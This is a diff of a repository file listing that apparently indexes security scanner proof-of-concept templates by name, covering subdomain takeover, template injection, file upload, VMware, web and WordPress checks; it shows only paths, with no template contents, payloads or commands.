./poc/subdomain_takeover/ngrok-takeover.yaml
./poc/subdomain_takeover/pagewiz-takeover.yaml
./poc/subdomain_takeover/pantheon-takeover-9458.yaml
-./poc/subdomain_takeover/pantheon-takeover-9459.yaml
./poc/subdomain_takeover/pantheon-takeover-9460.yaml
./poc/subdomain_takeover/pantheon-takeover-9461.yaml
./poc/subdomain_takeover/pantheon-takeover.yaml
-./poc/subdomain_takeover/pingdom-takeover-9584.yaml
./poc/subdomain_takeover/pingdom-takeover-9585.yaml
+./poc/subdomain_takeover/pingdom-takeover-9586.yaml
./poc/subdomain_takeover/pingdom-takeover-9587.yaml
./poc/subdomain_takeover/pingdom-takeover.yaml
./poc/subdomain_takeover/proposify-takeover-9693.yaml
./poc/subdomain_takeover/proposify-takeover-9694.yaml
-./poc/subdomain_takeover/proposify-takeover-9695.yaml
+./poc/subdomain_takeover/proposify-takeover-9696.yaml
./poc/subdomain_takeover/proposify-takeover.yaml
./poc/subdomain_takeover/readme-takeover-9841.yaml
+./poc/subdomain_takeover/readme-takeover-9842.yaml
./poc/subdomain_takeover/readme-takeover-9843.yaml
./poc/subdomain_takeover/readme-takeover.yaml
-./poc/subdomain_takeover/readthedocs-takeover-9844.yaml
./poc/subdomain_takeover/readthedocs-takeover-9845.yaml
+./poc/subdomain_takeover/readthedocs-takeover-9846.yaml
./poc/subdomain_takeover/readthedocs-takeover-9847.yaml
./poc/subdomain_takeover/readthedocs-takeover.yaml
./poc/subdomain_takeover/s3-subtakeover-9967.yaml
-./poc/subdomain_takeover/s3-subtakeover-9968.yaml
+./poc/subdomain_takeover/s3-subtakeover-9969.yaml
./poc/subdomain_takeover/s3-subtakeover.yaml
-./poc/subdomain_takeover/shopify-takeover-10201.yaml
./poc/subdomain_takeover/shopify-takeover-10202.yaml
./poc/subdomain_takeover/shopify-takeover-10203.yaml
./poc/subdomain_takeover/shopify-takeover-10204.yaml
./poc/subdomain_takeover/shopify-takeover.yaml
./poc/subdomain_takeover/short-io-takeover.yaml
./poc/subdomain_takeover/simplebooklet-takeover-10271.yaml
-./poc/subdomain_takeover/simplebooklet-takeover-10272.yaml
./poc/subdomain_takeover/simplebooklet-takeover-10273.yaml
+./poc/subdomain_takeover/simplebooklet-takeover-10274.yaml
./poc/subdomain_takeover/simplebooklet-takeover.yaml
+./poc/subdomain_takeover/smartjob-takeover-10322.yaml
./poc/subdomain_takeover/smartjob-takeover-10323.yaml
-./poc/subdomain_takeover/smartjob-takeover-10324.yaml
./poc/subdomain_takeover/smartjob-takeover-10325.yaml
./poc/subdomain_takeover/smartjob-takeover.yaml
-./poc/subdomain_takeover/smartling-takeover-10326.yaml
+./poc/subdomain_takeover/smartling-takeover-10327.yaml
./poc/subdomain_takeover/smartling-takeover.yaml
./poc/subdomain_takeover/smugmug-takeover-10337.yaml
-./poc/subdomain_takeover/smugmug-takeover-10338.yaml
+./poc/subdomain_takeover/smugmug-takeover-10339.yaml
./poc/subdomain_takeover/smugmug-takeover-10340.yaml
./poc/subdomain_takeover/smugmug-takeover.yaml
./poc/subdomain_takeover/sprintful-takeover-10495.yaml
./poc/subdomain_takeover/sprintful-takeover.yaml
./poc/subdomain_takeover/strikingly-takeover-10549.yaml
./poc/subdomain_takeover/strikingly-takeover-10550.yaml
+./poc/subdomain_takeover/strikingly-takeover-10551.yaml
./poc/subdomain_takeover/strikingly-takeover.yaml
./poc/subdomain_takeover/subdomain-takeOver.yaml
./poc/subdomain_takeover/subdomain-takeover-dns-wildcards.yaml
./poc/subdomain_takeover/subdomain-takeover-dns.yaml
./poc/subdomain_takeover/subdomain-takeover.yaml
-./poc/subdomain_takeover/surge-takeover-10578.yaml
./poc/subdomain_takeover/surge-takeover-10579.yaml
./poc/subdomain_takeover/surge-takeover.yaml
./poc/subdomain_takeover/surveygizmo-takeover-10581.yaml
@@ -95395,53 +95392,53 @@
./poc/subdomain_takeover/surveysparrow-takeover.yaml
./poc/subdomain_takeover/takeover-checker.yaml
./poc/subdomain_takeover/tave-takeover-10659.yaml
+./poc/subdomain_takeover/tave-takeover-10660.yaml
./poc/subdomain_takeover/tave-takeover-10661.yaml
-./poc/subdomain_takeover/tave-takeover-10662.yaml
./poc/subdomain_takeover/tave-takeover.yaml
+./poc/subdomain_takeover/teamwork-takeover-10668.yaml
./poc/subdomain_takeover/teamwork-takeover-10669.yaml
-./poc/subdomain_takeover/teamwork-takeover-10670.yaml
./poc/subdomain_takeover/teamwork-takeover-10671.yaml
./poc/subdomain_takeover/teamwork-takeover.yaml
-./poc/subdomain_takeover/tictail-takeover-10767.yaml
+./poc/subdomain_takeover/tictail-takeover-10766.yaml
./poc/subdomain_takeover/tictail-takeover-10768.yaml
./poc/subdomain_takeover/tictail-takeover.yaml
-./poc/subdomain_takeover/tilda-takeover-10781.yaml
./poc/subdomain_takeover/tilda-takeover-10782.yaml
+./poc/subdomain_takeover/tilda-takeover-10783.yaml
./poc/subdomain_takeover/tilda-takeover-10784.yaml
./poc/subdomain_takeover/tilda-takeover.yaml
+./poc/subdomain_takeover/tumblr-takeover-10845.yaml
./poc/subdomain_takeover/tumblr-takeover-10846.yaml
-./poc/subdomain_takeover/tumblr-takeover-10847.yaml
./poc/subdomain_takeover/tumblr-takeover.yaml
./poc/subdomain_takeover/uberflip-takeover-10864.yaml
./poc/subdomain_takeover/uberflip-takeover-10865.yaml
./poc/subdomain_takeover/uberflip-takeover-10866.yaml
./poc/subdomain_takeover/uberflip-takeover.yaml
-./poc/subdomain_takeover/unbounce-takeover-10971.yaml
+./poc/subdomain_takeover/unbounce-takeover-10970.yaml
./poc/subdomain_takeover/unbounce-takeover.yaml
./poc/subdomain_takeover/uptimerobot-takeover-10986.yaml
+./poc/subdomain_takeover/uptimerobot-takeover-10987.yaml
./poc/subdomain_takeover/uptimerobot-takeover-10988.yaml
-./poc/subdomain_takeover/uptimerobot-takeover-10989.yaml
./poc/subdomain_takeover/uptimerobot-takeover.yaml
./poc/subdomain_takeover/urge-takeover.yaml
./poc/subdomain_takeover/uservoice-takeover.yaml
-./poc/subdomain_takeover/vend-takeover-10996.yaml
./poc/subdomain_takeover/vend-takeover-10997.yaml
+./poc/subdomain_takeover/vend-takeover-10998.yaml
./poc/subdomain_takeover/vend-takeover-10999.yaml
./poc/subdomain_takeover/vend-takeover.yaml
-./poc/subdomain_takeover/vercel-takeover-11001.yaml
+./poc/subdomain_takeover/vercel-takeover-11000.yaml
./poc/subdomain_takeover/vercel-takeover.yaml
-./poc/subdomain_takeover/webflow-takeover-11131.yaml
./poc/subdomain_takeover/webflow-takeover-11132.yaml
+./poc/subdomain_takeover/webflow-takeover-11133.yaml
./poc/subdomain_takeover/webflow-takeover-11134.yaml
./poc/subdomain_takeover/webflow-takeover.yaml
./poc/subdomain_takeover/wishpond-takeover-11215.yaml
-./poc/subdomain_takeover/wishpond-takeover-11217.yaml
+./poc/subdomain_takeover/wishpond-takeover-11216.yaml
./poc/subdomain_takeover/wishpond-takeover-11218.yaml
./poc/subdomain_takeover/wishpond-takeover.yaml
./poc/subdomain_takeover/wix-takeover-11219.yaml
./poc/subdomain_takeover/wordpress-takeover-11310.yaml
./poc/subdomain_takeover/wordpress-takeover-11311.yaml
-./poc/subdomain_takeover/wordpress-takeover-11313.yaml
+./poc/subdomain_takeover/wordpress-takeover-11312.yaml
./poc/subdomain_takeover/wordpress-takeover-11314.yaml
./poc/subdomain_takeover/wordpress-takeover.yaml
./poc/subdomain_takeover/worksite-takeover-workflow-11389.yaml
@@ -95449,11 +95446,11 @@
./poc/subdomain_takeover/worksites-takeover.yaml
./poc/subdomain_takeover/wpsite-background-takeover-27e55b32604a97373f48c9d933458e81.yaml
./poc/subdomain_takeover/wpsite-background-takeover.yaml
-./poc/subdomain_takeover/wufoo-takeover-11649.yaml
+./poc/subdomain_takeover/wufoo-takeover-11648.yaml
./poc/subdomain_takeover/wufoo-takeover-11650.yaml
./poc/subdomain_takeover/wufoo-takeover-11651.yaml
./poc/subdomain_takeover/wufoo-takeover.yaml
-./poc/subdomain_takeover/zendesk-takeover-11780.yaml
+./poc/subdomain_takeover/zendesk-takeover-11781.yaml
./poc/subdomain_takeover/zendesk-takeover-11782.yaml
./poc/subdomain_takeover/zendesk-takeover-11783.yaml
./poc/subdomain_takeover/zendesk-takeover.yaml
@@ -95461,15 +95458,17 @@
./poc/template_injection/hidden-ssti.yaml
./poc/template_injection/jeecg-boot-ssti.yaml
./poc/template_injection/node-nunjucks-ssti.yaml
+./poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml
./poc/template_injection/pdf-signer-ssti-to-rce-9471.yaml
-./poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml
./poc/template_injection/pdf-signer-ssti-to-rce.yaml
+./poc/template_injection/pikpikcussti.yaml
./poc/template_injection/reflection-ssti.yaml
./poc/template_injection/ssti-10528.yaml
./poc/template_injection/ssti-fuzz.yaml
./poc/template_injection/ssti-jinja2.yaml
./poc/template_injection/ssti-vuln-params.yaml
./poc/template_injection/ssti.yaml
+./poc/template_injection/twig-php-ssti-10856.yaml
./poc/template_injection/twig-php-ssti-10857.yaml
./poc/template_injection/twig-php-ssti-10858.yaml
./poc/template_injection/twig-php-ssti-10859.yaml
@@ -95613,7 +95612,6 @@
./poc/upload/exposed-jquery-file-upload-7313.yaml
./poc/upload/exposed-jquery-file-upload-7314.yaml
./poc/upload/exposed-jquery-file-upload-7315.yaml
-./poc/upload/exposed-jquery-file-upload.yaml
./poc/upload/fanruan-finereport-v9-design-save-svg-fileupload.yaml
./poc/upload/fanruan-oa-v9-designsavevg-upload-file.yaml
./poc/upload/fanwei-e-office-v10-fileupload.yaml
@@ -95765,8 +95763,8 @@
./poc/upload/nsfocus-nf-bugsInfo-fileupload.yaml
./poc/upload/oa-v9-uploads-file-9187.yaml
./poc/upload/oa-v9-uploads-file-9188.yaml
-./poc/upload/oa-v9-uploads-file-9189.yaml
-./poc/upload/oa-v9-uploads-file-9190.yaml
+./poc/upload/oa-v9-uploads-file-9191.yaml
+./poc/upload/oa-v9-uploads-file.yaml
./poc/upload/pc4uploader.yaml
./poc/upload/pigcms-manage-admin-fileupload.yaml
./poc/upload/powercreator-arbitrary-file-upload.yaml
@@ -95842,6 +95840,7 @@
./poc/upload/shiziyuCMS-ck-AnyFileUpload.yaml
./poc/upload/showdoc-file-upload-rce-10225.yaml
./poc/upload/showdoc-file-upload-rce-10226.yaml
+./poc/upload/showdoc-file-upload-rce-10227.yaml
./poc/upload/showdoc-file-upload-rce-10228.yaml
./poc/upload/showdoc-file-upload-rce.yaml
./poc/upload/showdoc-uploadfile.yaml
@@ -95892,8 +95891,9 @@
./poc/upload/ueditor_1433_net-upload-catchimage.yaml
./poc/upload/unauthenticated-popup-upload-10919.yaml
./poc/upload/unauthenticated-popup-upload-10920.yaml
-./poc/upload/unauthenticated-popup-upload-10922.yaml
+./poc/upload/unauthenticated-popup-upload-10921.yaml
./poc/upload/unauthenticated-popup-upload-10923.yaml
+./poc/upload/unauthenticated-popup-upload.yaml
./poc/upload/upload-file-type-settings-plugin-34a83d20c52593027e0331b726395a3e.yaml
./poc/upload/upload-file-type-settings-plugin.yaml
./poc/upload/upload-media-by-url-76789b55ff551b3b92d96d845bdeb7a3.yaml
@@ -96091,9 +96091,10 @@
./poc/vmware/vmware-hcx-login.yaml
./poc/vmware/vmware-horizon-11038.yaml
./poc/vmware/vmware-horizon-11039.yaml
-./poc/vmware/vmware-horizon-11041.yaml
+./poc/vmware/vmware-horizon-11040.yaml
./poc/vmware/vmware-horizon-daas.yaml
./poc/vmware/vmware-horizon-log4j-jndi-rce-11034.yaml
+./poc/vmware/vmware-horizon-log4j-jndi-rce.yaml
./poc/vmware/vmware-horizon-log4j-rce.yaml
./poc/vmware/vmware-horizon-panel-11035.yaml
./poc/vmware/vmware-horizon-panel-11037.yaml
@@ -96107,13 +96108,13 @@
./poc/vmware/vmware-vcenter-cve-2021-21985-rce.yml
./poc/vmware/vmware-vcenter-lfi-1.yaml
./poc/vmware/vmware-vcenter-lfi-11046.yaml
-./poc/vmware/vmware-vcenter-lfi-11047.yaml
./poc/vmware/vmware-vcenter-lfi-11048.yaml
./poc/vmware/vmware-vcenter-lfi-2.yaml
./poc/vmware/vmware-vcenter-lfi-3.yaml
./poc/vmware/vmware-vcenter-lfi-linux-11042.yaml
./poc/vmware/vmware-vcenter-lfi-linux-11043.yaml
./poc/vmware/vmware-vcenter-lfi-linux-11045.yaml
+./poc/vmware/vmware-vcenter-lfi.yaml
./poc/vmware/vmware-vcenter-log4j-jndi-rce-11050.yaml
./poc/vmware/vmware-vcenter-ssrf-11051.yaml
./poc/vmware/vmware-vcenter-ssrf-11052.yaml
@@ -96127,12 +96128,13 @@
./poc/vmware/vmware-virtualcenter.yaml
./poc/vmware/vmware-vrealize-cve-2021-21975-ssrf.yml
./poc/vmware/vmware-vrealize-detect-11056.yaml
-./poc/vmware/vmware-vrealize-detect-11057.yaml
./poc/vmware/vmware-vrealize-detect-11058.yaml
+./poc/vmware/vmware-vrealize-detect.yaml
./poc/vmware/vmware-vrealize-operations-manager.yaml
./poc/vmware/vmware-vrealize.yaml
./poc/vmware/vmware-vsphere.yaml
-./poc/vmware/vmware-workflow-11059.yaml
+./poc/vmware/vmware-workflow-11060.yaml
+./poc/vmware/vmware-workflow.yaml
./poc/vmware/vmware-workspace-one-log4j-rce.yaml
./poc/vmware/vmwareview.yaml
./poc/web/360-webscan.yaml
@@ -96190,7 +96192,6 @@
./poc/web/allwebmenus-wordpress-menu-plugin.yaml
./poc/web/alphaweb-default-login-276.yaml
./poc/web/alphaweb-default-login-277.yaml
-./poc/web/alphaweb-default-login.yaml
./poc/web/am-websystem.yaml
./poc/web/amazon-web-services-phish.yaml
./poc/web/apache-oozie-web-console.yaml
@@ -96198,10 +96199,9 @@
./poc/web/appsmith-web-login.yaml
./poc/web/arangodb-web-Interface.yaml
./poc/web/archibus-webcentral-panel.yaml
-./poc/web/artica-web-proxy-detect-543.yaml
./poc/web/artica-web-proxy-detect-544.yaml
-./poc/web/artica-web-proxy-detect-545.yaml
./poc/web/artica-web-proxy-detect-546.yaml
+./poc/web/artica-web-proxy-detect.yaml
./poc/web/artica-web-proxy-workflow.yaml
./poc/web/automatedlogiccorporation-webctrl.yaml
./poc/web/avtech-video-web-server.yaml
@@ -96210,22 +96210,22 @@
./poc/web/aweber-web-form-widget.yaml
./poc/web/axel-webserver.yaml
./poc/web/axigen-webadmin-659.yaml
-./poc/web/axigen-webadmin-660.yaml
./poc/web/axigen-webadmin-661.yaml
./poc/web/axigen-webmail-663.yaml
./poc/web/axigen-webmail-664.yaml
-./poc/web/axigen-webmail.yaml
./poc/web/axis2-web.yaml
./poc/web/axway-securetransport-webclient.yaml
-./poc/web/azkaban-web-client-676.yaml
./poc/web/azkaban-web-client-677.yaml
./poc/web/azkaban-web-client-678.yaml
./poc/web/azkaban-web-client-679.yaml
+./poc/web/azkaban-web-client-680.yaml
./poc/web/azkaban-web-client-default-creds.yaml
./poc/web/azure-website-enum.yaml
./poc/web/bizcalendar-web-bbb880210d42a6df93041f7b5a68a42e.yaml
./poc/web/bizcalendar-web.yaml
+./poc/web/boa-web-fileread-11846.yaml
./poc/web/boa-web-fileread.yaml
+./poc/web/boa-web-server.yaml
./poc/web/carel-pcoweb-hvac-bacnet-gateway-directory-traversal.yaml
./poc/web/catch-web-tools-7e509c5743e470c1816b86d61338d841.yaml
./poc/web/catch-web-tools-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml
@@ -96246,11 +96246,11 @@
./poc/web/cleanweb-panel.yaml
./poc/web/cloud-enum-azure-website.yaml
./poc/web/cobbler-webgui-1122.yaml
-./poc/web/cobbler-webgui-1124.yaml
+./poc/web/cobbler-webgui-1123.yaml
./poc/web/cobbler-webgui.yaml
+./poc/web/codemeter-webadmin-panel-1135.yaml
./poc/web/codemeter-webadmin-panel-1136.yaml
./poc/web/codemeter-webadmin-panel-1137.yaml
-./poc/web/codemeter-webadmin-panel-1138.yaml
./poc/web/codemeter-webadmin-panel.yaml
./poc/web/codemeter-webadmin.yaml
./poc/web/codesys-webvisu.yaml
@@ -96327,8 +96327,8 @@
./poc/web/ewebs-arbitrary-file-reading-7273.yaml
./poc/web/ewebs-lfi.yaml
./poc/web/ewebs.yaml
+./poc/web/exposed-webalizer-7358.yaml
./poc/web/exposed-webalizer-7359.yaml
-./poc/web/exposed-webalizer-7360.yaml
./poc/web/exposed-webalizer.yaml
./poc/web/facebook-by-weblizar-5f0cf300a16245f7f5c3b4c848d038d5.yaml
./poc/web/facebook-by-weblizar.yaml
@@ -96396,6 +96396,7 @@
./poc/web/h3c-web应用防火墙.yaml
./poc/web/h3c-web网管.yaml
./poc/web/hanweb-system.yaml
+./poc/web/hashicorp-consul-webgui-7896.yaml
./poc/web/hashicorp-consul-webgui-7897.yaml
./poc/web/hashicorp-consul-webgui-7898.yaml
./poc/web/hashicorp-consul-webgui.yaml
@@ -96406,7 +96407,6 @@
./poc/web/homeworks-illumination-web-keypad.yaml
./poc/web/honeywell-web-controller-7994.yaml
./poc/web/honeywell-web-controller-7995.yaml
-./poc/web/honeywell-web-controller-7996.yaml
./poc/web/honeywell-web-controller.yaml
./poc/web/honeywell-xl-web-controller.yaml
./poc/web/horde-webmail-login.yaml
@@ -96449,10 +96449,9 @@
./poc/web/icewarp-webclient-rce-8130.yaml
./poc/web/icewarp-webclient-rce-8131.yaml
./poc/web/icewarp-webclient-rce-8132.yaml
-./poc/web/icewarp-webclient-rce-8133.yaml
+./poc/web/icinga-web-login-8134.yaml
./poc/web/icinga-web-login-8135.yaml
./poc/web/icinga-web-login-8136.yaml
-./poc/web/icinga-web-login-8137.yaml
./poc/web/icinga-web-login.yaml
./poc/web/ideawebserver.yaml
./poc/web/igenus-webmail.yaml
@@ -96469,7 +96468,7 @@
./poc/web/indigitall-web-push-notifications.yaml
./poc/web/ip-guard-webserver-rce.yaml
./poc/web/iplanet-web-server-8189.yaml
-./poc/web/iplanet-web-server-8190.yaml
+./poc/web/iplanet-web-server-8191.yaml
./poc/web/iplanet-web-server.yaml
./poc/web/iwebshop.yaml
./poc/web/iwebsns.yaml
@@ -96484,7 +96483,7 @@
./poc/web/keenetic-web-login-8439.yaml
./poc/web/keenetic-web-login-8440.yaml
./poc/web/keenetic-web-login-8441.yaml
-./poc/web/keenetic-web-login-8443.yaml
+./poc/web/keenetic-web-login-8442.yaml
./poc/web/keenetic-web-login.yaml
./poc/web/keil-embedded-web-server.yaml
./poc/web/kerio-webstar.yaml
@@ -96567,8 +96566,8 @@
./poc/web/openwebui-panel.yaml
./poc/web/opt-webfieldassis.yaml
./poc/web/oracle-iplanet-web-server-9391.yaml
+./poc/web/oracle-iplanet-web-server-9392.yaml
./poc/web/oracle-iplanet-web-server-9393.yaml
-./poc/web/oracle-iplanet-web-server.yaml
./poc/web/oracle-webdb.yaml
./poc/web/oracle-weblogic.yaml
./poc/web/original-texts-yandex-webmaster-2e0593c9307af66de377149e0e6a4d6c.yaml
@@ -96616,11 +96615,11 @@
./poc/web/ruijie_EWEB_route_auth_rce.yaml
./poc/web/saia-web-server-info-9978.yaml
./poc/web/saia-web-server-info-9979.yaml
+./poc/web/saia-web-server-info.yaml
./poc/web/samphpweb.yaml
./poc/web/sap-netweaver-webgui-10056.yaml
./poc/web/sap-netweaver-webgui-10057.yaml
./poc/web/sap-netweaver-webgui-10059.yaml
-./poc/web/sap-netweaver-webgui.yaml
./poc/web/sap-nw-abap-webgui.yaml
./poc/web/sap-web-application-server.yaml
./poc/web/sap-web-dispatcher-10074.yaml
@@ -96629,6 +96628,7 @@
./poc/web/sap-web-dispatcher-10078.yaml
./poc/web/sap-web-dispatcher-admin-portal-10069.yaml
./poc/web/sap-web-dispatcher-admin-portal-10070.yaml
+./poc/web/sap-web-dispatcher-admin-portal-10071.yaml
./poc/web/sap-web-dispatcher-admin-portal-10072.yaml
./poc/web/sap-web-dispatcher-admin-portal-10073.yaml
./poc/web/sap-web-dispatcher-admin-portal.yaml
@@ -96652,7 +96652,7 @@
./poc/web/simple-custom-website-data-plugin.yaml
./poc/web/simple-custom-website-data.yaml
./poc/web/simsweb.yaml
-./poc/web/slack-webhook-11865.yaml
+./poc/web/slack-webhook(1).yaml
./poc/web/slack-webhook-token-10315.yaml
./poc/web/slack-webhook.yaml
./poc/web/sma-sunny_webbox.yaml
@@ -96661,6 +96661,7 @@
./poc/web/sophos-utm-web-protection.yaml
./poc/web/sophos-web-appliance.yaml
./poc/web/spark-webui-unauth-10400.yaml
+./poc/web/spark-webui-unauth-10401.yaml
./poc/web/spark-webui-unauth-10402.yaml
./poc/web/spark-webui-unauth.yaml
./poc/web/spark-webui-unauth.yml
@@ -96746,7 +96747,6 @@
./poc/web/web-cache-poisoning.yaml
./poc/web/web-config-11123.yaml
./poc/web/web-config-11124.yaml
-./poc/web/web-config-11125.yaml
./poc/web/web-config-11126.yaml
./poc/web/web-config-11127.yaml
./poc/web/web-config.yaml
@@ -96774,7 +96774,6 @@
./poc/web/web-file-manager.yaml
./poc/web/web-framework-detect.yaml
./poc/web/web-ftp-detect-11135.yaml
-./poc/web/web-ftp-detect-11136.yaml
./poc/web/web-ftp-detect-11137.yaml
./poc/web/web-ftp-detect-11138.yaml
./poc/web/web-instant-messenger-4ae688b6df13f1343923a0c3f1daa933.yaml
@@ -96786,8 +96785,8 @@
./poc/web/web-invoice-568a28d02436de053e0789f1133f8a51.yaml
./poc/web/web-invoice-639321e1bd4c22ce8fd4e6ce306ce3fd.yaml
./poc/web/web-invoice.yaml
+./poc/web/web-local-craft-11139.yaml
./poc/web/web-local-craft-11140.yaml
-./poc/web/web-local-craft-11141.yaml
./poc/web/web-local-craft.yaml
./poc/web/web-minimalist-200901-c22f0a0c3966959ccbbc8e0bebf65053.yaml
./poc/web/web-minimalist-200901.yaml
@@ -96800,7 +96799,7 @@
./poc/web/web-stories-fc9200f38f324ac4675bb76c80fa16f7.yaml
./poc/web/web-stories.yaml
./poc/web/web-suite-detect-11167.yaml
-./poc/web/web-suite-detect.yaml
+./poc/web/web-suite-detect-11168.yaml
./poc/web/web-viewer-panel.yaml
./poc/web/web-wiz-rich-text-editor.yaml
./poc/web/web-xml-finder(1).yaml
@@ -96843,11 +96842,10 @@
./poc/web/webcam-2way-videochat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/web/webcam-2way-videochat-plugin.yaml
./poc/web/webcam-2way-videochat.yaml
-./poc/web/webcamxp-5-11122.yaml
+./poc/web/webcamxp-5.yaml
./poc/web/webcomco-panel.yaml
./poc/web/webeditors-1.yaml
./poc/web/webeditors-11128.yaml
-./poc/web/webeditors-11129.yaml
./poc/web/webeditors-11130.yaml
./poc/web/webeditors-2.yaml
./poc/web/webeditors-3.yaml
@@ -96869,8 +96867,8 @@
./poc/web/weberino-timed-quiz-creator.yaml
./poc/web/webflow-pages-1ea2b2d3f70cdc2bbd228fad03d8cc84.yaml
./poc/web/webflow-pages.yaml
-./poc/web/webflow-takeover-11131.yaml
./poc/web/webflow-takeover-11132.yaml
+./poc/web/webflow-takeover-11133.yaml
./poc/web/webflow-takeover-11134.yaml
./poc/web/webflow-takeover.yaml
./poc/web/webfolio-31eb77eaefc61e112478e9f1952e822d.yaml
@@ -96933,11 +96931,10 @@
./poc/web/weblogic-ssrf.yaml
./poc/web/weblogic-ssrf.yml
./poc/web/weblogic-t3-detect-11151.yaml
-./poc/web/weblogic-t3-detect-11152.yaml
+./poc/web/weblogic-t3-detect-11153.yaml
./poc/web/weblogic-t3-detect.yaml
./poc/web/weblogic-t3-search.yaml
./poc/web/weblogic-uddiexplorer.yaml
-./poc/web/weblogic-weak-login-11154.yaml
./poc/web/weblogic-weak-login-11155.yaml
./poc/web/weblogic-weak-login-11156.yaml
./poc/web/weblogic-workflow-11157.yaml
@@ -96964,9 +96961,9 @@
./poc/web/webmin-panel.yaml
./poc/web/webmin-workflow.yaml
./poc/web/webmin.yaml
+./poc/web/webmodule-ee-11162.yaml
./poc/web/webmodule-ee-11163.yaml
-./poc/web/webmodule-ee-11164.yaml
-./poc/web/webmodule-ee-panel-11160.yaml
+./poc/web/webmodule-ee-panel-11161.yaml
./poc/web/webmodule-ee-panel.yaml
./poc/web/webmodule-ee.yaml
./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml
@@ -97022,21 +97019,21 @@
./poc/web/webtransfer-client-panel.yaml
./poc/web/webtrees-install.yaml
./poc/web/webtrust-cert.yaml
-./poc/web/webui-rce-11170.yaml
./poc/web/webui-rce-11171.yaml
./poc/web/webui-rce-11172.yaml
./poc/web/webui-rce-11173.yaml
+./poc/web/webui-rce-11174.yaml
./poc/web/webui-rce.yaml
./poc/web/webuploader.yaml
./poc/web/webuzo-admin-panel.yaml
./poc/web/webuzo-installer.yaml
./poc/web/webview-addjavascript-interface-11175.yaml
-./poc/web/webview-addjavascript-interface-11177.yaml
+./poc/web/webview-addjavascript-interface-11176.yaml
./poc/web/webview-addjavascript-interface.yaml
./poc/web/webview-javascript-11178.yaml
./poc/web/webview-javascript.yaml
+./poc/web/webview-load-url-11180.yaml
./poc/web/webview-load-url-11181.yaml
-./poc/web/webview-load-url-11182.yaml
./poc/web/webview-load-url.yaml
./poc/web/webview-universal-access-11183.yaml
./poc/web/webview-universal-access-11185.yaml
@@ -97068,7 +97065,6 @@
./poc/web/xp-webcam-11696.yaml
./poc/web/xp-webcam-11697.yaml
./poc/web/xp-webcam-11699.yaml
-./poc/web/xp-webcam.yaml
./poc/web/xweb500-panel.yaml
./poc/web/yonyou-nc-ncfindweb-directory-traversal.yaml
./poc/web/yonyou-u9-umwebservice-fileread.yaml
@@ -97267,7 +97263,6 @@
./poc/wordpress/alfacgiapi-wordpress-257.yaml
./poc/wordpress/alfacgiapi-wordpress-3.yaml
./poc/wordpress/alfacgiapi-wordpress-4.yaml
-./poc/wordpress/alfacgiapi-wordpress.yaml
./poc/wordpress/all-in-one-wp-migration-08b487f085e8087c59e905026c1c075f.yaml
./poc/wordpress/all-in-one-wp-migration-1650269cab833c79cc04147ad34dbaad.yaml
./poc/wordpress/all-in-one-wp-migration-23b0a34f39e5c93f169108f329b1e3c9.yaml
@@ -97690,7 +97685,7 @@
./poc/wordpress/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml
./poc/wordpress/easy-wp-smtp-listing-7154.yaml
./poc/wordpress/easy-wp-smtp-listing-7155.yaml
-./poc/wordpress/easy-wp-smtp-listing-7157.yaml
+./poc/wordpress/easy-wp-smtp-listing-7156.yaml
./poc/wordpress/easy-wp-smtp-listing.yaml
./poc/wordpress/easy-wp-smtp.yaml
./poc/wordpress/easyrotator-for-wordpress-0184078b79ad95363b9f16489d7e6821.yaml
@@ -97758,6 +97753,7 @@
./poc/wordpress/feedwordpress-db142dc7dc2479e241016bfec90b9659.yaml
./poc/wordpress/feedwordpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/feedwordpress-plugin.yaml
+./poc/wordpress/feedwordpress-xss-7459.yaml
./poc/wordpress/feedwordpress-xss-7460.yaml
./poc/wordpress/feedwordpress-xss.yaml
./poc/wordpress/feedwordpress.yaml
@@ -98366,7 +98362,6 @@
./poc/wordpress/n-media-wp-simple-quiz.yaml
./poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml
./poc/wordpress/nativechurch-wp-theme-lfd-9000.yaml
-./poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml
./poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml
./poc/wordpress/nativechurch-wp-theme-lfd-9003.yaml
./poc/wordpress/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml
@@ -98714,7 +98709,6 @@
./poc/wordpress/transposh-translation-filter-for-wordpress.yaml
./poc/wordpress/triberr-wordpress-plugin-a366a26580883f88c953f87f94a969cb.yaml
./poc/wordpress/triberr-wordpress-plugin.yaml
-./poc/wordpress/trilithic-viewpoint-default-10835.yaml
./poc/wordpress/trilithic-viewpoint-default-10836.yaml
./poc/wordpress/trilithic-viewpoint-default-password.yaml
./poc/wordpress/trilithic-viewpoint-default.yaml
@@ -98761,7 +98755,6 @@
./poc/wordpress/viewpoint-system-status-11016.yaml
./poc/wordpress/viewpoint-system-status-11017.yaml
./poc/wordpress/viewpoint-system-status-11018.yaml
-./poc/wordpress/viewpoint-system-status-11019.yaml
./poc/wordpress/viewpoint-system-status.yaml
./poc/wordpress/views-for-wpforms-lite-3242a9557ef1bd82e6212d9b01c1527e.yaml
./poc/wordpress/views-for-wpforms-lite-9616fb3bedf6e4ae461ce40dedf17ff9.yaml
@@ -99041,7 +99034,6 @@
./poc/wordpress/wordpress-accessible-wpconfig-10.yaml
./poc/wordpress/wordpress-accessible-wpconfig-11.yaml
./poc/wordpress/wordpress-accessible-wpconfig-11234.yaml
-./poc/wordpress/wordpress-accessible-wpconfig-11235.yaml
./poc/wordpress/wordpress-accessible-wpconfig-11237.yaml
./poc/wordpress/wordpress-accessible-wpconfig-11238.yaml
./poc/wordpress/wordpress-accessible-wpconfig-11239.yaml
@@ -99072,8 +99064,8 @@
./poc/wordpress/wordpress-ae44f6a1ec4312db054e74e48af20717.yaml
./poc/wordpress/wordpress-af2937e1967165caa42cd4ad64300421.yaml
./poc/wordpress/wordpress-afad16faf36b64e536b10247898859bf.yaml
-./poc/wordpress/wordpress-affiliatewp-log-11240.yaml
./poc/wordpress/wordpress-affiliatewp-log-11241.yaml
+./poc/wordpress/wordpress-affiliatewp-log-11242.yaml
./poc/wordpress/wordpress-affiliatewp-log-11243.yaml
./poc/wordpress/wordpress-affiliatewp-log-11244.yaml
